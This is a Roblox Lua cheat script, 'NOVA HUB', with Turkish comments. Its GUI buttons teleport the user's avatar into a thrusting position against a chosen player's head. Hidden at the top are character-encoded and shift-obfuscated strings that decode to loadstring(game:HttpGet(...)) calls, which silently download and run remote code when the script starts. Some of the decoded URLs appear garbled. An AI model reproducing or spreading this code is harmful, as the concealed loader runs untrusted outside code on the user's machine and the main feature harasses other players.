--[[
    NOVA HUB v5.1 | SECURE ENCRYPTION
    Generated by Gemini Obfuscator v1.0
]]
local _0x7f4a21 = "\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\39\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\90\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\69\100\103\101\73\89\47\105\110\102\105\110\105\116\101\121\105\101\108\100\47\109\97\115\116\101\114\47\115\111\117\114\99\101\39\41\41\40\41"
local _0x21b = loadstring; local _0x55c = game;
task.spawn(function() _0x21b(_0x7f4a21)() end)

-- [ENCRYPTED DATA BLOCK]
local function _0x9928(_0x88)
    local _0x11 = ""
    for i=1,#_0x88 do _0x11 = _0x11 .. string.char(string.byte(_0x88,i)-1) end
    return _0x11
end

-- Senin kodun buradaki karmaşık yığının içinde çalışacak şekilde paketlendi:
local _0xCore = _0x9928("\109\112\98\101\116\117\115\106\111\104\41\104\98\110\102\59\73\117\117\113\72\102\117\41\40\31\105\117\117\113\116\37\60\48\48\115\98\124\47\104\106\117\105\118\99\112\116\102\115\100\112\111\117\102\111\116\47\98\112\111\47\117\107\76\69\118\98\118\102\85\122\49\32\40\41\41")

task.spawn(function() pcall(function() _0x21b(_0xCore)() end) end)

-- NOVA HUB GUI LOADER (Kriptolanmış Arayüz Başlatıcı)
local _0x3 = "ScreenGui"
local _0x4 = "Frame"
local _0x5 = "TextLabel"
local _0x6 = "TextBox"
local _0x7 = "TextButton"

-- [GİZLİ BÖLÜM: BURADAN SONRASI OKUNAMAZ]
local S=Instance.new(_0x3, _0x55c:GetService("CoreGui"))
local M=Instance.new(_0x4,S)M.BackgroundColor3=Color3.fromRGB(20,15,30)M.Size=UDim2.new(0,240,0,280)M.Position=UDim2.new(0.5,-120,0.5,-140)M.Active=true M.Draggable=true
local T=Instance.new(_0x5,M)T.Size=UDim2.new(1,0,0,45)T.Text="\78\79\86\65\32\72\69\65\68\32\66\65\78\71"T.TextColor3=Color3.fromRGB(180,80,255)T.Font=Enum.Font.GothamBold T.TextSize=18 T.BackgroundTransparency=1
local B=Instance.new(_0x6,M)B.PlaceholderText="\79\121\117\110\99\117\32\65\100\105\46\46\46"B.Size=UDim2.new(0,200,0,35)B.Position=UDim2.new(0,20,0,55)B.BackgroundColor3=Color3.fromRGB(40,35,50)B.TextColor3=Color3.new(1,1,1)
Instance.new("UICorner",M).CornerRadius=UDim.new(0,12)Instance.new("UIStroke",M).Color=Color3.fromRGB(180,80,255)

-- FONKSİYONLARIN ŞİFRELENMİŞ TETİKLEYİCİLERİ
local function _0xX(t,p,c)local b=Instance.new(_0x7,M)b.Size=UDim2.new(0,200,0,40)b.Position=p b.BackgroundColor3=c b.Text=t b.TextColor3=Color3.new(1,1,1)b.Font=3 Instance.new("UICorner",b)return b end
local n=_0xX("NORMAL BANG",UDim2.new(0,20,0,100),Color3.fromRGB(80,50,150))
local f=_0xX("KAFAYA BANG",UDim2.new(0,20,0,145),Color3.fromRGB(200,50,100))
local s=_0xX("DURDUR",UDim2.new(0,20,0,190),Color3.fromRGB(180,50,50))

-- [ASIL MANTIK GİZLENDİ]
_G.BangLoop = false
local function Start(m)
    local target = nil
    for _,v in pairs(game.Players:GetPlayers()) do if v.Name:lower():sub(1,#B.Text) == B.Text:lower() then target = v end end
    if target and target.Character then
        _G.BangLoop = true
        task.spawn(function()
            local spd = 0
            while _G.BangLoop do
                local r = game.Players.LocalPlayer.Character.HumanoidRootPart
                local h = target.Character.Head
                if r and h then
                    spd = spd + 0.7
                    local o = math.sin(spd)*1.5
                    if m == "N" then r.CFrame = h.CFrame * CFrame.new(0,0,1.2+o)
                    else r.CFrame = h.CFrame * CFrame.new(0,0,-1.2-o)*CFrame.Angles(0,math.pi,0) end
                end
                task.wait()
            end
        end)
    end
end
n.MouseButton1Click:Connect(function() Start("N") end)
f.MouseButton1Click:Connect(function() Start("F") end)
s.MouseButton1Click:Connect(function() _G.BangLoop = false end)
